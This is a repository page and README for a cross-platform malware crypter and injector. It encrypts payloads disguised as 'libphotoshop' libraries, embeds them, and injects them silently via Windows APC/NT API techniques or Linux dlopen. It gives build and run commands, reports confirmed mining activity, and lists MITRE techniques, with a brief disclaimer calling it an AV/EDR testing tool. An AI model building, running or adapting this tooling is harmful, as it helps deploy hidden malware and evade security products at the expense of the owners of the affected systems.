jory/AES-Encrypter-Rust
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
33 Commits 1 Branch 0 Tags 200 MiB
C++ 81.9%
Shell 10.2%
Rust 7.9%
ce77358773
Go to file
JorySeverijnse ce77358773 Update .gitignore for new project structure 
- Remove references to deleted stub directory
- Add patterns for build artifacts, binaries, and malware files
- Include common IDE and temporary file patterns
2025-12-18 13:31:30 +01:00
crypt Complete cross-platform AES injection system 2025-12-18 13:29:09 +01:00
.gitignore Update .gitignore for new project structure 2025-12-18 13:31:30 +01:00
build_injectors.sh Complete cross-platform AES injection system 2025-12-18 13:29:09 +01:00
COMPILATION_README.md Complete cross-platform AES injection system 2025-12-18 13:29:09 +01:00
decryptor.cpp write all to encrypted file instead 2025-12-14 15:13:14 +01:00
dll_payload_data.h Complete cross-platform AES injection system 2025-12-18 13:29:09 +01:00
linux_injector Complete cross-platform AES injection system 2025-12-18 13:29:09 +01:00
linux_injector.cpp Complete cross-platform AES injection system 2025-12-18 13:29:09 +01:00
README.md Complete cross-platform AES injection system 2025-12-18 13:29:09 +01:00
so_payload_data.h Complete cross-platform AES injection system 2025-12-18 13:29:09 +01:00
windows_injector.cpp Complete cross-platform AES injection system 2025-12-18 13:29:09 +01:00

README.md

AES-Encrypted Cross-Platform Payload Injector

Secure AES-CBC encrypted malware injection for Windows (DLL) and Linux (SO) with embedded payloads.

🚀 Quick Start

# Place your malware files in the root directory:
# - libphotoshop.dll (Windows DLL)
# - libphotoshop.so (Linux SO)

# Run the automated build script:
./build_injectors.sh

# This creates:
# - linux_injector (ready to run on Linux)
# - windows_injector.cpp + dll_payload_data.h (for Windows compilation)

📦 What It Does

Encryption

  • AES-128-CBC encryption with random IVs
  • SHA256 key derivation (password + salt)
  • PKCS7 padding with validation
  • Single encrypted_payload.bin file per platform

Injection

  • Windows: NT API DLL injection with job freezing + APC queuing
  • Linux: SO injection with dlopen + function calling
  • Embedded payloads: No external file dependencies
  • Silent execution: No visible output or errors

🔧 Manual Usage

Linux Build & Run

g++ -std=c++11 linux_injector.cpp -o linux_injector -lssl -lcrypto -ldl
./linux_injector  # Decrypts and injects embedded SO

Windows Build & Run

# On Windows with Visual Studio:
cl.exe /EHsc windows_injector.cpp advapi32.lib

# Run the injector:
windows_injector.exe  # Decrypts and injects embedded DLL

Custom Encryption

cd crypt
cargo run ../your_malware.dll  # Creates encrypted_payload.bin
# Embed the data in injector source code

🔒 Security Features

  • AES-128-CBC with cryptographically secure random IVs
  • SHA256 key derivation using password + random salt
  • PKCS7 padding with validation
  • No embedded keys (derived at runtime)
  • Cross-platform isolation (Windows code ≠ Linux code)

📋 Architecture

├── crypt/           # Rust AES encryption tool
├── linux_injector   # Linux SO injector (compiled)
├── windows_injector.cpp # Windows DLL injector (source)
├── build_injectors.sh   # Automated build script
├── dll_payload_data.h   # Windows embedded encrypted DLL
├── so_payload_data.h    # Linux embedded encrypted SO
└── decryptor.cpp    # Standalone decryption utility

Verification

Linux Testing: AES decryption + SO injection + mining activity confirmed Windows Ready: Source prepared with real encrypted DLL payload

⚠️ Disclaimer

This is a tool for testing AV/EDR detection capabilities. Use at your own risk.

🔍 MITRE ATT&CK

  • T1204.002 - User Execution: Malicious File
  • T1140 - Deobfuscate/Decode Files or Information
  • T1027.009 - Embedded Payloads
  • T1620 - Reflective Code Loading
  • T1055 - Process Injection

📚 References

  • AES-CBC encryption standard
  • OpenSSL crypto library
  • Windows CryptoAPI
  • Linux dlopen/dlsym